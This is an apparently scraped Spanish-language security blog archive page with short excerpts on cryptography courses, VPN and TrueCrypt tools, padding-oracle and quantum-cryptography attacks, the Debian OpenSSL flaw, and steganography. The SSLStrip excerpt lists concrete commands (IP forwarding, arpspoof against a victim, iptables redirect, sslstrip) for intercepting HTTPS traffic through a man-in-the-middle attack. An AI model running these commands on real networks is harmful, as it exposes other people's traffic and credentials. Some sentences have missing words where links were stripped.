Archivo | Criptografia Fuente RSS para esta sección
Curso Gratis de Criptografía

Curso Gratis de Criptografía

de Criptografía, La de Stanford acaba de lanzar una iniciativa con la cual pretende difundir conocimiento de calidad y gratuitamente a cualquier interesado con una por internet, de los cursos ofertados que incluye áreas como la Medicina, Ingeniería civil, Emprendimiento, Electrónica, Sistemas Complejos, se destacan los cursos enfocados a las Ciencias de la Computación y entre esta área existe un online.

Curso Gratis de Criptografia Curso Gratis de Criptografía

Este Curso Gratis de Criptografía será dictado por el Dr. Dan Boneh, autor de más de un centenar de publicaciones en el campo y ganador del Premio Packard, el Premio Alfred P. Sloan, el premio RSA en las matemáticas y recientemente ha recibido el premio Ishii a la innovación en industria de la educación. Leer más…

El curso de Criptografía y Ofuscación de Yury Lifshits

El curso de Criptografía y Ofuscación de Yury Lifshits

Yury Lifshits el conocido matemático ruso, que trabaja para como científico en !, miembro de los grupos Paradise group y Theory group, ha publicado varios de los cursos que ha dictado en los últimos años por distintos institutos y universidades, en diferentes partes del mundo.

CriptografiayOfuscacion El curso de Criptografía y Ofuscación de Yury Lifshits

Dentro de los cursos publicados por lifshits podremos encontrar referencias a sistemas de búsquedas, algoritmos de reputación, charlas sobre la nueva web, entre otros que pongo a continuación: Leer más…

Lluvia de 0days en la EKOParty

Lluvia de 0days en la EKOParty

Una de las charlas mas esperadas en la EKOParty 2010 fue la del argentino Juliano Rizzo y el vietnamita Thai Duong, titulada “Padding Oracles Everywhere” donde estos dos personajes, nos mostraban un nuevo no publico que afectaría el 25% de los sitios en la .

0Day ASP.NET  Lluvia de 0days en la EKOParty

Empieza explicándonos de que se tratan los ataques de tipo “Oracle” (oráculo), los conceptos criptográficos de la vulnerabilidad, nos enseño la herramienta POET, que automáticamente puede encontrar y explotar las vulnerabilidades de tipo Oracle y los algoritmos que implementaron en ella. Leer más…

proXPN – Una VPN gratuita para navegación anónima y segura

proXPN – Una VPN gratuita para navegación anónima y segura

proXPN proXPN   Una VPN gratuita para navegación anónima y seguraproXPN es un software de (Virtual Private Network por sus siglas en Ingles) gratuito que te permite realizar una y anónima entre nosotros e Internet, cifrando la información que recibas o transmitas por ella. Las conexiones de una Privada Virtual son como hacer un túnel entre tu computadora y el sitio de conexión. Esta implementación es muy utilizada en empresas que quieren darle a la información que se maneja entre sus servidores y terminales que están fuera del área de la local (la física de la empresa).

Si estamos navegando con proXPN en un lugar publico como un hotel, una universidad, o un café, podremos estar “tranquilos” por que nuestro datos viajan codificados (con 2048 Bits) por medio del túnel que se a creado entre el servidor y nosotros, aunque los datos sean interceptados no podrán hacer nada con ellos ya que estos se encuentran cifrados, puedes hacerte una mejor idea sobre el funcionamiento de proXPN con el siguiente vídeo:

Para utilizar proXPN, basta con descargarlo desde su pagina oficial, instalarlo en nuestro sistema (de momento solo disponible para Windows, X e iPhone) seguido de esto basta con iniciar el programa, nos aparecerá un icono en la barra de estado, donde debemos darle en conectar, metemos nuestro datos de acceso (si no tienes cuenta, puedes crearla desde el mismo software) y una vez el icono del proXPN quede en verde, podremos navegar de forma segura y anónima desde donde queramos.

Este software es de gran utilidad ya que no solo codifica y vuelve anónima nuestra conexión, sino que al tener una ip externa estadounidense podremos entrar a distintos sitios en los que las ip’s de este país tienen algún privilegio, por ejemplo megaupload, o pandora (que ahora solo se puede acceder desde usa). En fin una excelente utilidad que ayudara un poco a mantenernos anónimos en la red… que la disfruten.

Descarga proXPN para tu Sistema Operativo

PD. si nos desconectamos y nos volvemos a utilizar obtendremos otra ip de estados unidos totalmente diferente (muy útil para servicios de descargas como rapidshare x ejemplo).

Más Información:
Pagina oficial del proXPN

TrueCrypt – Cifra tu información en particiones virtuales

TrueCrypt – Cifra tu información en particiones virtuales

TrueCrypt es una aplicación gratuita y de que nos permite crear cifradas virtuales, donde podemos almacenar toda nuestra informacion sensible para que solo quien cuente con la contraseña correcta o el archivo de clave pueda acceder a ella.

TrueCrypt TrueCrypt   Cifra tu información en particiones virtuales

Esta aplicación se ha vuelto realmente popular, ya que cuenta con muchas características que la hacen resaltar frente a comerciales similares, es multiplataforma (de momento Windows, GNU Linux y Max OS X), permite con una gran cantidad de algoritmos (AES, TWOFISH, SERPENT, etc..), sencillo de manejar e instalar (ver tutorial de TrueCrypt en la comundiad), permite cifrar múltiples medios ( duros, USB, ’s, CD’s, etc..) y todo esto totalmente . Leer más…

SSLStrip – Espiando tráfico SSL

SSLStrip – Espiando tráfico SSL

Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede tu trafico sin problemas.

sslstrip SSLStrip   Espiando tráfico SSL

El funcionamiento de es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar icon wink SSLStrip   Espiando tráfico SSL

Mas Información:
Pagina Oficial del SSLStrip

Rompen el primer sistema de criptografía cuántica

Rompen el primer sistema de criptografía cuántica

Nada supera la criptografía a la hora de información o realizar una trasmisión de esta, ya que en teoría si alguien observa la información esta se modifica de tal forma que no sea posible recuperar su contenido.

4616224634 a2bd9abc8e Rompen el primer sistema de criptografía cuántica

Eso es lo que pasa sobre el papel, pero a la hora de implementar la teoría la cosa es muy diferente; Los investigadores Feihu Xu, Bing Qi y Hoi-Kwong de la de Toronto en Canadá lograron romper el primer sistema comercial de criptografía cuántica creado por la empresa ID Quantique.

Feihu Xu, Bing Qi y Hoi-Kwong, basaron su ataque  en las suposiciones hechas sobre el tipo de errores que pueden aparecer en los cuánticos. Alice y Bob siempre mantienen un ojo alerta sobre el nivel de error en sus debido a que saben que Eve introducirá errores si intercepta y lee cualquiera de los bits cuánticos. Por lo que una alta tasa de error es una señal de que el mensaje está siendo capturado. Leer más…

Análisis del Fallo en el Generador de Números Aleatorios de OpenSSL/Debian

El año pasado en el Tercer Encuentro Internacional de Seguridad Informática (EISI), contamos con la participación de , desarrollador de Debian e investigador del Si6. quien salto a la fama tras descubrir un problema en el generador de números pseudoaleatorios (PRNG) de la versión de distribuída por y derivados (Ubuntu, Kubuntu, etc).

Precisamente sobre este tema habló en el EISI  III (descarga las diapositivas si deseas) y nos explico claramente el origen del problema, como se explotaba y su solución; para quienes no asistieron al encuentro internacional de (el encuentro de en Colombia), les dejo una serie de vídeos realizados por el mismo Luciano Bello para la Universitat Oberta de Catalunya ( Abierta de Cataluña) en el que nos explican paso a paso el famoso en OpenSSL que afectó Debian y sus derivados hace ya 2 años. Leer más…

El arte de ocultar información – Esteganografía

INTECO (Observatorio de la de la Información) acaba de publicar un nuevo artículo de la serie “Cuaderno de del Observatorio” titulado “, El Arte de Ocultar Información“, donde nos da conocer un poco de historia sobre este tema así  como las técnicas para ocultar información utilizadas actualmente y las medidas a tomara para evitar la fuga de información por este medio.

imagenarticuloesteganog El arte de ocultar información   Esteganografía

La esteganografía se puede definir como la ocultación de información en un canal encubierto con el propósito de prevenir la detección de un mensaje oculto. En este articulo, se dan a conocer las técnicas en que se basa la estenografía, sus aplicaciones y diferencias frente a la criptografía. Leer más…